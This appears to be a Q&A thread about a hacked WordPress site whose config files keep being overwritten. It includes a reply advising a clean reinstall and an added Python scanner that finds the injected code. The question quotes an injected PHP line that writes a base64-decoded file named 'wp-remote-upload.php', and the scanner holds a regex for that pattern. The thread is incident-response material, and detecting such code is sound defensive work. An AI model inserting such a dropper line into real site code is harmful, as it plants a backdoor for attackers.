Jimmery

Reputation: 10139

htaccess and WordPress config files are regularly overwritten

I have a WordPress site (v5.2.3), and every now and again (possibly monthly) the wp-config.php and .htaccess files are overwritten with bad information.

This results in two problems - first the DB access details in wp-config are changed to something that doesn't work, and then the ability to access my post-link permalinks is lost as a result of information being lost from htaccess.

After being overwritten, my wp-config file is full of lines like this:

file_put_contents("wp-remote-upload.php", base64_decode('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'));

My wp-config file has so many of these lines that it is about 800Kb in size.

The plugins I am using on my WordPress site are as follows:

Using my FTP program I have tried changing the permissions to the wp-config.php and .htaccess files so they cannot be written to - however my attempts to change these values have resulted in no changes. I am assuming I do not have the ability to change file permissions.


How do I stop these files from being overwritten?

Or how can I discover what is responsible for changing these files?

Upvotes: 0

Views: 117

Answers (1)

04FS

Reputation: 5820

Looks like your system was compromised / hacked.

Suggest you start by googling what to do in such a case, there’s plenty of resources out there that cover the basics.

Ideally, you should probably delete all core WP and plugin folders, and upload the files again from a “clean” system (to avoid that other files that might have been inserted into your system can still be reached by the attacker from the outside.)

Upvotes: 1
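As an added example (not part of the original question or answer), the following Python script scans a downloaded copy of the site for the `file_put_contents(..., base64_decode(...))` line quoted in the question and for the files those lines write. It assumes the site has been copied to a local directory, for instance over FTP; the function names and the sample tree are constructed for illustration.

```python
import os, re, sys, tempfile, time

# Pattern from the question: file_put_contents("<name>", base64_decode('...'));
DROPPER = re.compile(
    rb"""file_put_contents\s*\(\s*["']([^"']+)["']\s*,\s*base64_decode\s*\(""")
SCANNED = (".php", ".phtml", ".htaccess")

def scan_tree(root):
    """Return (injected, dropped).
    injected: {path: (call_count, mtime)} for files containing the dropper call.
    dropped: sorted paths whose file name is a target of one of those calls."""
    injected, names, all_files = {}, set(), []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            all_files.append(path)
            if not name.endswith(SCANNED):
                continue
            try:
                with open(path, "rb") as fh:
                    found = DROPPER.findall(fh.read())
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            if found:
                injected[path] = (len(found), os.path.getmtime(path))
                names.update(os.path.basename(f.decode("utf-8", "replace")) for f in found)
    # PHP resolves a relative target against the request's working directory,
    # so look for the dropped names anywhere in the tree, not only beside the caller.
    dropped = sorted(p for p in all_files if os.path.basename(p) in names)
    return injected, dropped

def report(root):
    """Print findings, oldest modification first; return the number of findings."""
    injected, dropped = scan_tree(root)
    for path, (calls, mtime) in sorted(injected.items(), key=lambda kv: kv[1][1]):
        stamp = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(mtime))
        print(f"INJECTED {stamp} calls={calls} {path}")
    for path in dropped:
        print(f"DROPPED  {path}")
    return len(injected) + len(dropped)

if __name__ == "__main__":
    if len(sys.argv) > 1:
        sys.exit(1 if report(sys.argv[1]) else 0)
    with tempfile.TemporaryDirectory() as demo:  # constructed sample tree
        with open(os.path.join(demo, "wp-config.php"), "w") as fh:
            fh.write('<?php\nfile_put_contents("wp-remote-upload.php", base64_decode(\'QUJD\'));\n')
        open(os.path.join(demo, "wp-remote-upload.php"), "w").close()
        report(demo)
```

The modification times it prints are only useful if the copy preserved them; matching them against the web server's access log for the same minutes is one way to see which request rewrote the files.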
